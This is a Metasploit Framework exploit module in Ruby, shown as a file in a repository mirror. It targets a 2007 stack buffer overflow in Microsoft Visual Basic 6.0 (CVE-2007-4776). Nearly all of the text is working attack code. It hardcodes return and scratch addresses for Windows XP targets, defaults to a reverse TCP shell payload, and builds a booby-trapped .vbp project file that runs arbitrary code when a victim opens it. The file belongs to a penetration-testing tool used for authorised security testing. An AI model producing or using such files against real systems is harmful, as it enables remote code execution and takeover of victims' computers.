adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
8528cb255a994eb621269a34412be0caa1d511f5
metasploit-gs/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb
T
cgranleese-r7 37388ca1be Adds sentinel values to modules missing notes
2025-06-23 12:24:58 +01:00

134 lines
4.3 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft Visual Basic VBP Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Microsoft Visual Basic
6.0. A specially crafted Visual Basic Project (VBP) file containing
a long reference line can be used to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Arch' => [ARCH_X86],
'Author' => [
'Koshi', # Discovery and exploit
'MC', # Metasploit
'bcoles', # Offsets for XP x86-64
],
'References' => [
[ 'CVE', '2007-4776' ],
[ 'CWE', '119' ],
[ 'EDB', '4361' ],
[ 'OSVDB', '36936' ],
[ 'BID', '25629' ]
],
'DefaultOptions' => {
'PAYLOAD' => 'windows/shell/reverse_tcp',
'EXITFUNC' => 'process',
'DisablePayloadHandler' => true
},
'Payload' => {
'Space' => 650,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' => [
[
'Windows XP SP0-SP3 (x86) (English)', {
'Ret' => 0x0fabd271, # call esp ; vba6.dll
'Scratch' => 0x7ffddfb4 # Address=0x7ffdd000; Size=0x1000; Access=RW; InitialAccess=RW
}
],
[
'Windows XP SP1-SP2 (x86-64) (English)', {
'Ret' => 0x0fabd271, # call esp ; vba6.dll
'Scratch' => 0x7efa9010 # Address=0x7efa9000; Size=0x1000; Access=RW; InitialAccess=RW
}
],
],
'Privileged' => false,
'DisclosureDate' => '2007-09-04',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_DOWN ],
'SideEffects' => [ ARTIFACTS_ON_DISK ],
'Reliability' => [ UNRELIABLE_SESSION ]
}
)
)
register_options(
[
OptString.new('FILENAME', [true, 'The project file name.', 'msf.vbp']),
]
)
end
def exploit
form_name = "Form#{rand(1..9)}"
sploit = rand_text_alpha_upper(496)
sploit << [target.ret].pack('V')
sploit << rand_text_alpha_upper(12)
sploit << [target['Scratch']].pack('V')
sploit << make_nops(24)
sploit << payload.encoded
vbp = "Type=Exe\r\n"
# We exclude the "Form" field so we don't have to ship a form file (.frm)
# along with the project file (.vbp). If the specified form file is not
# present within the same directory as the project file, the user is warned
# the file does not exist, and is prompted to confirm loading the project.
# Selecting "No" halts loading the project and prevents payload execution.
# vbp << "Form=#{form_name}.frm\r\n"
vbp << 'Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINNT\\System32\\stdole2.tlb#OLE Automation'
vbp << "#{sploit}\r\n"
vbp << "Startup=\"#{form_name}\"\r\n"
vbp << "Command32=\"\"\r\n"
vbp << "Name=\"Project#{rand(1..9)}\"\r\n"
vbp << "HelpContextID=\"0\"\r\n"
vbp << "CompatibleMode=\"0\"\r\n"
vbp << "MajorVer=1\r\n"
vbp << "MinorVer=#{rand(1..9)}\r\n"
vbp << "RevisionVer=#{rand(1..9)}\r\n"
vbp << "AutoIncrementVer=0\r\n"
vbp << "ServerSupportFiles=0\r\n"
vbp << "VersionCompanyName=\"\"\r\n"
vbp << "CompilationType=0\r\n"
vbp << "OptimizationType=0\r\n"
vbp << "FavorPentiumPro(tm)=0\r\n"
vbp << "CodeViewDebugInfo=0\r\n"
vbp << "NoAliasing=0\r\n"
vbp << "BoundsCheck=0\r\n"
vbp << "OverflowCheck=0\r\n"
vbp << "FlPointCheck=0\r\n"
vbp << "FDIVCheck=0\r\n"
vbp << "UnroundedFP=0\r\n"
vbp << "StartMode=0\r\n"
vbp << "Unattended=0\r\n"
vbp << "Retained=0\r\n"
vbp << "ThreadPerObject=0\r\n"
vbp << "MaxNumberOfThreads=1\r\n"
vbp << "[MS Transaction Server]\r\n"
vbp << "AutoRefresh=1\r\n"
print_status("Creating '#{datastore['FILENAME']}' file for #{target.name} ...")
file_create(vbp)
end
end
Reference in New Issue View Git Blame Copy Permalink